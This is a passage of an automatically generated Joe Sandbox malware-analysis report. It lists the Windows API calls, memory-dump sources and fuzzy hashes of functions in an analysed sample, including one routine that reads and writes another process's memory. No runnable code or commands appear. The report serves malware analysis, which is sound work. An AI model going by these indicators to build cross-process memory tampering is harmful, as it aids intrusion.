                                    • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,001CDC50,?,0000000F,0000000C,00000016,001CDC50,?), ref: 00174645
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                    • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001746C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: BuffCharUpper$__itow__swprintf
                                    • String ID: REMOVE$THIS
                                    • API String ID: 3797816924-776492005
                                    • Opcode ID: 9cd3a0ad04ed6958668a2f02862ba303dc1a2f1addb4f951d348653d4cea03c8
                                    • Instruction ID: fba7337df8ed47562defd583b5c5f69e89a848284735ad7f5621db2d7529b4a5
                                    • Opcode Fuzzy Hash: 9cd3a0ad04ed6958668a2f02862ba303dc1a2f1addb4f951d348653d4cea03c8
                                    • Instruction Fuzzy Hash: 64419274A002599FCF08EFA4C881AADB7F5FF59314F14C069E91AAB2A2DB34DD45CB50
                                    APIs
                                      • Part of subcall function 0017430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0016BC08,?,?,00000034,00000800,?,00000034), ref: 00174335
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0016C1D3
                                      • Part of subcall function 001742D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0016BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00174300
                                      • Part of subcall function 0017422F: GetWindowThreadProcessId.USER32(?,?), ref: 0017425A
                                      • Part of subcall function 0017422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0016BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0017426A
                                      • Part of subcall function 0017422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0016BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00174280
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0016C240
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0016C28D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    • API String ID: 4150878124-2766056989
                                    • Opcode ID: 0ae7377968a0e591407a13249e8ae8507682fb67457b2f7615ea132fe4fdda5e
                                    • Instruction ID: 1cfc8bbf6c9ed8d0d9a16db85d2b97c303dc0b0b0815415270ab40860d5a843f
                                    • Opcode Fuzzy Hash: 0ae7377968a0e591407a13249e8ae8507682fb67457b2f7615ea132fe4fdda5e
                                    • Instruction Fuzzy Hash: 77414F72900218AFDB10DFA4DC91AEEB778FF19700F004099FA85B7181DB716E95CBA1
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001CDC00,00000000,?,?,?,?), ref: 0019A6D8
                                    • GetWindowLongW.USER32 ref: 0019A6F5
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0019A705
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: fdaa0bc902549ddf71c623d9f109204f6edf75758b07136a0fda8135f33f2652
                                    • Instruction ID: cc8057280c21dd73622abe8284318398bf131c1c67f669925ed323fce56e7849
                                    • Opcode Fuzzy Hash: fdaa0bc902549ddf71c623d9f109204f6edf75758b07136a0fda8135f33f2652
                                    • Instruction Fuzzy Hash: 8131DC3120020AABDF258F78DC41BEA7BA9FF49324F254728F875932E0D771E8548B90
                                    APIs
                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0019A15E
                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0019A172
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0019A196
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window
                                    • String ID: SysMonthCal32
                                    • API String ID: 2326795674-1439706946
                                    • Opcode ID: 2f52b0ce8eca06f60fd846a1a4881adf4f702df07447777c34c9b5756d243a42
                                    • Instruction ID: fcd5dbaf3e7e5b045bb81383675e06278012fbd7b742610aae11649f5b783c5e
                                    • Opcode Fuzzy Hash: 2f52b0ce8eca06f60fd846a1a4881adf4f702df07447777c34c9b5756d243a42
                                    • Instruction Fuzzy Hash: EE217F32510218ABDF158F94CC42FEA3BB9EF48754F110224FE55AB1D0D7B5AC55CB90
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0019A941
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0019A94F
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0019A956
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$DestroyWindow
                                    • String ID: msctls_updown32
                                    • API String ID: 4014797782-2298589950
                                    • Opcode ID: d4c7b255cc18d78316f56d44ab6c1a358060217b95b329f361923cf8803ce56d
                                    • Instruction ID: d9983e38a1af3770873d6082cd220a8ffbe51a65493c485fdcff3df13890a987
                                    • Opcode Fuzzy Hash: d4c7b255cc18d78316f56d44ab6c1a358060217b95b329f361923cf8803ce56d
                                    • Instruction Fuzzy Hash: 05219DB5600209BFDB10DF28DC81DB737ADEF5A3A8B450159FA049B2A1DB70EC55CBA1
                                    APIs
                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00199A30
                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00199A40
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00199A65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$MoveWindow
                                    • String ID: Listbox
                                    • API String ID: 3315199576-2633736733
                                    • Opcode ID: 018f7a93307ac83f6e352aa5fb52472a99da9ed5377c08394b99303df40d0987
                                    • Instruction ID: 1dddac5d4eb76108b69ee785959eac4c9d3e6a7a46dcbfcd6a289820ce66a898
                                    • Opcode Fuzzy Hash: 018f7a93307ac83f6e352aa5fb52472a99da9ed5377c08394b99303df40d0987
                                    • Instruction Fuzzy Hash: 93219F72610118BFDF258F58DC85FBF3BAAEF89764F018129F9549B1A0C771AC5287A0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0019A46D
                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0019A482
                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0019A48F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_trackbar32
                                    • API String ID: 3850602802-1010561917
                                    • Opcode ID: 429d4cdf2356667f9f48dc211458921d53c6d998e04b689aa72147b0cd863e0e
                                    • Instruction ID: 90f740316ce88eadd87cddd0e324f664d786008f0ddecb20b658f828d8f33342
                                    • Opcode Fuzzy Hash: 429d4cdf2356667f9f48dc211458921d53c6d998e04b689aa72147b0cd863e0e
                                    • Instruction Fuzzy Hash: 6F110A71200208BEEF245F65CC45FAB3769FF88B54F064118FA4597091D3B2E811C760
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 001522A1
                                    • GetProcAddress.KERNEL32(00000000), ref: 001522A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 2574300362-340411864
                                    • Opcode ID: ba0009afa94f4550dd8a71fcf8c9d3f5bff8637014def3cd9564df6880a025dc
                                    • Instruction ID: f05f580a55b9436396df90e7c91e95e9805dc8578eaee37b91de3ba41bea3935
                                    • Opcode Fuzzy Hash: ba0009afa94f4550dd8a71fcf8c9d3f5bff8637014def3cd9564df6880a025dc
                                    • Instruction Fuzzy Hash: ABE04F74698301ABDB155FB0FC8DB683765BB05702F504460F102EA8E0EBB594C4CF04
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00152276), ref: 00152376
                                    • GetProcAddress.KERNEL32(00000000), ref: 0015237D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 2574300362-2819208100
                                    • Opcode ID: 5d9a7248c8a0b96bc69976dc8731280340b51edc84f53522b42b53435f51dedc
                                    • Instruction ID: 0dd296ec52e3a07c74e1d3df0ee4529c0b1557ce2f8b3b435f7fb25370e274be
                                    • Opcode Fuzzy Hash: 5d9a7248c8a0b96bc69976dc8731280340b51edc84f53522b42b53435f51dedc
                                    • Instruction Fuzzy Hash: 1EE0EC74688300EFDB666F60FD4DB243A65BB0A702F120464F509E68B1DBB894D4CB14
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LocalTime__swprintf
                                    • String ID: %.3d$WIN_XPe
                                    • API String ID: 2070861257-2409531811
                                    • Opcode ID: 82e77fcb5a4ac52b72151e6fb1db163f1627f331b7e007e79d923d159f7ac42c
                                    • Instruction ID: 9b667d15c560c3fcca112acd6d72c4114a781917cafb3fe69f458e1a1f0642bc
                                    • Opcode Fuzzy Hash: 82e77fcb5a4ac52b72151e6fb1db163f1627f331b7e007e79d923d159f7ac42c
                                    • Instruction Fuzzy Hash: D1E0C271804658EBDB099B40DD04DF973BCAF09311F9100D2B906E1008E3308B88EA13
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0014E014,75570AE0,0014DEF1,001CDC38,?,?), ref: 0014E02C
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0014E03E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: 2e08b096730bcb46e45cd2053ab884fe4cad2054302b9df3726ad0e041ff75d7
                                    • Instruction ID: aaa5d55ad52eb5e081723c3a821dfc5cb172d46fbf16e5a600baf0c1b19ca346
                                    • Opcode Fuzzy Hash: 2e08b096730bcb46e45cd2053ab884fe4cad2054302b9df3726ad0e041ff75d7
                                    • Instruction Fuzzy Hash: F2D0A730500B229FC7354F65FC0861676DCBF00700F184439F491D3560EBF8C8C08650
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,001921FB,?,001923EF), ref: 00192213
                                    • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00192225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetProcessId$kernel32.dll
                                    • API String ID: 2574300362-399901964
                                    • Opcode ID: 61f02d7bae1675e370acb7898370e6552ff2262be9e39a9875632b36c4f5d663
                                    • Instruction ID: 8187993ebb3f8e81a4c9a1e983ac1cb8ffae0d83b5fffe2f007872be5c03586d
                                    • Opcode Fuzzy Hash: 61f02d7bae1675e370acb7898370e6552ff2262be9e39a9875632b36c4f5d663
                                    • Instruction Fuzzy Hash: B4D0A734400B12AFCB294F36FC0860576D8EF06700B004429E841E2650EB70D8C08650
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,001342EC,?,001342AA,?), ref: 00134304
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00134316
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-1355242751
                                    • Opcode ID: 6c8c43b580cf8b28ba8c7021f657cb50fea0c72d3cbbc514aad1003d2e7519df
                                    • Instruction ID: 54e1ff5c3f03d9844b2d17ec2097ca8f98f74a48770f5525c87ed67049870cbc
                                    • Opcode Fuzzy Hash: 6c8c43b580cf8b28ba8c7021f657cb50fea0c72d3cbbc514aad1003d2e7519df
                                    • Instruction Fuzzy Hash: 66D0A730400B229FC7245F65FC0C60576E8BB04701F004429E451D3561EBB4D8C08610
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,001341BB,00134341,?,0013422F,?,001341BB,?,?,?,?,001339FE,?,00000001), ref: 00134359
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0013436B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 2574300362-3689287502
                                    • Opcode ID: 011b53e85382a833278c4c1f994071eb8f70e1b661be7a3a2e039fe9da380f0e
                                    • Instruction ID: 4f3e56c119fd30a0baa4af7fc1e63cf5d0e37b7a4474ba763756a86b62bdf082
                                    • Opcode Fuzzy Hash: 011b53e85382a833278c4c1f994071eb8f70e1b661be7a3a2e039fe9da380f0e
                                    • Instruction Fuzzy Hash: AFD0A730400B229FC7248F35FC086057AD8BB10715F004529E4D1D3550EBB4E8C08610
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,0017051D,?,001705FE), ref: 00170547
                                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00170559
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1071820185
                                    • Opcode ID: 1a149abc8b9a6f92a72b2ee17852a452748f5537d8fbd20dc9042b3b3b4e9939
                                    • Instruction ID: de7179240accafeab051b23d782071b7d83e2c527b1a3b2c6045481f78b4f4d5
                                    • Opcode Fuzzy Hash: 1a149abc8b9a6f92a72b2ee17852a452748f5537d8fbd20dc9042b3b3b4e9939
                                    • Instruction Fuzzy Hash: DED0A730500B12DFC7208F65FC0860576FCAB04701B10C42DE44AD2590E7B0CCC08A10
                                    APIs
                                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0017052F,?,001706D7), ref: 00170572
                                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00170584
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                    • API String ID: 2574300362-1587604923
